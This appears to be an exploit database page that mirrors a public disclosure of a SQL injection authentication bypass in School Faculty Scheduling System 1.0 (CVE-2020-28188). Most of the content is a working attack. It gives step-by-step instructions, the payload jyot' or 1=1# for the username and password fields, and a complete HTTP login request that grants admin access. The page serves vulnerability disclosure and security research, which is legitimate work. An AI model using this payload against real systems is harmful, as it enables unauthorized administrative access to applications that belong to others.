School Faculty Scheduling System 1.0 SQL Injection
CVE
Category
Price
Severity
CVE-2020-28188
CWE-89
$500
High
Author
Risk
Exploitation Type
Date
John Doe
Critical
Remote
2020-10-22
CPE
cpe:cpe:/a:school-faculty-scheduling-system:1.0
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100142 Below is a copy:
School Faculty Scheduling System 1.0 SQL Injection # Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass
# Date: 21/10/2020
# Exploit Author: Jyotsna Adhana
# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin
Step 2: use payload jyot' or 1=1# in user and password field
Malicious Request
POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/schoolFSS/scheduling/admin/login.php
Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
Step 3: You will be logged in as admin.
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum